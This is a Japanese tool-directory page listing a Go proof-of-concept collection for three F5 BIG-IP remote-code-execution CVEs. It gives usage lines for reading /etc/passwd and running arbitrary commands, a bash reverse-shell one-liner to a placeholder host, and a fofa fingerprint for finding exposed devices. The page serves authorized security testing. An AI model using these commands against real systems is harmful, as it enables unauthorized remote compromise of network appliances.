Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
F5-BIG-IP-POC — CVE-2020-5902 CVE-2021-22986 CVE-2022-1388 POCコレクション | Kitploit
ツール/GitHubGitHub/west9b/f5-big-ip-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロールリモートアクセスツール
GitHubwest9b/f5-big-ip-poc

F5-BIG-IP-POC

CVE-2020-5902 CVE-2021-22986 CVE-2022-1388 POCコレクション

リポジトリを見る
1024年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

F5-BIG-IP POC

Go言語で記述されたCVE-2020-5902、CVE-2021-22986、CVE-2022-1388のPOCコレクション。今後、F5の他のPOCも追加予定。

author:160team.west9B

※セキュリティ研究者が許可を得た場合にのみ使用してください。サイバーセキュリティ法を遵守し、発生したいかなる問題についても、作者は一切の責任を負いません。

01-基本説明

F5 POC集:

CVE-2020-5902:F5 BIG-IP リモートコード実行脆弱性

CVE-2021-22986:F5 BIG-IP iControl REST 未認証リモートコマンド実行脆弱性

CVE-2022-1388:認証バイパスによるリモートコマンド実行

02-使用方法

usage: ./F5-BIG-IP -u url

CVE-2020-5902の検証には任意のファイルダウンロードを使用し、/etc/passwdが返された場合、脆弱性が存在します。

CVE-2021-22986、CVE-2022-1388のPOCはデフォルトでidコマンドを実行し、{id}が返された場合、脆弱性が存在します。-cオプションでカスタムコマンドを指定可能。

リバースシェル

usage: ./cve-2022-30525.exe -m exp -u url -c bash -i >& /dev/tcp/xxxx/1377 0>&1

Screenshots

Image text Image text

fofa

icon_hash="-335242539"

ツールをダウンロード